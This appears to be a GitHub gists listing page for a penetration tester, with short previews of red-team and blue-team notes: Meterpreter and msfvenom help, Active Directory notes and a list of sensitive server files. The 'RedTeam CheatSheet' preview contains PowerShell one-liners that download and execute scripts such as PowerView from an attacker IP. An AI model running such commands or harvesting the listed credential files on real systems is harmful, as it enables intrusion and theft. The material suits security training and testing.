ImaginaryBIT’s gists

ImaginaryBIT / ExpandDefenderSig.ps1

Created April 15, 2019 10:03 — forked from mattifestation/ExpandDefenderSig.ps1

Decompresses Windows Defender AV signatures for exploration purposes

	filter Expand-DefenderAVSignatureDB {
	<#
	.SYNOPSIS

	Decompresses a Windows Defender AV signature database (.VDM file).

	.DESCRIPTION

	Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed.

ImaginaryBIT / RedTeam_CheatSheet.ps1

Last active October 31, 2023 22:44 — forked from m8sec/RedTeam_CheatSheet.ps1

#05. RedTeam CheatSheet

	# General Payload
	```powershell
	$ExecutionContext.SessionState.LanguageMode
	Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
	dir C:\Windows\Microsoft.Net\Framework64
	Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"

	IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/apple.txt");
	IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/loadDLL64.txt");
	IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/PowerView.ps1");

ImaginaryBIT / Meterpreter Cheatsheet

Last active April 2, 2025 23:17

	meterpreter > help

	Metasploit has two versions of Mimikatz available as Meterpreter extensions:
	version 1.0 by loading the mimikatz extension, and the newer version 2.x by loading the kiwi extension.

	Core Commands
	=============

	Command Description
	------- -----------

ImaginaryBIT / Msfvenom Cheatsheet

Last active April 1, 2025 22:54

	MsfVenom - a Metasploit standalone payload generator.
	Also a replacement for msfpayload and msfencode.
	Usage: /usr/bin/msfvenom [options] <var=val>

	Options:
	-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, formats, all
	-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
	--list-options List --payload <value>'s standard, advanced and evasion options
	-f, --format <format> Output format (use --list formats to list)
	-e, --encoder <encoder> The encoder to use (use --list encoders to list)

ImaginaryBIT / Union Bypass List

Last active February 3, 2020 07:43

ImaginaryBIT / significant_Local_Files

Last active June 20, 2022 05:51

	# Significant Files
	//Windows
	\inetpub\wwwroot\web.config
	\inetpub\logs\LogFiles\*

	\xampp\apache\conf\httpd.conf
	\xampp\apache\conf\extra\httpd-xampp.conf
	\xampp\security\webdav.htpasswd
	\xampp\apache\logs\access.log
	\xampp\php\php.ini

ImaginaryBIT / Active Directory Cheat Sheet

Last active April 11, 2025 01:04

	Enable advanced features to view all attributes and tabs

	OU
	-add child OU
	-add individual user, computer, printer...

	Users
	-add user group
	-set member of another group
	-add member

ImaginaryBIT / Blue Team

Last active May 4, 2024 14:58

Blue Team

	# Intrusion Investigation - Is this computer compromised?
	Divide and Conquer Process - Breaking big questions into smaller
	Artifacts Categories:
	1. User
	- Accounts
	- Logins
	- User Acitivities
	a. Launching programs
	b. Accessing data
	c. Searching for data

ImaginaryBIT / Social Engineering

Created January 18, 2021 02:48

social engineering

ImaginaryBIT / pty_spawn.c

Created February 25, 2022 10:07 — forked from bomsi/pty_spawn.c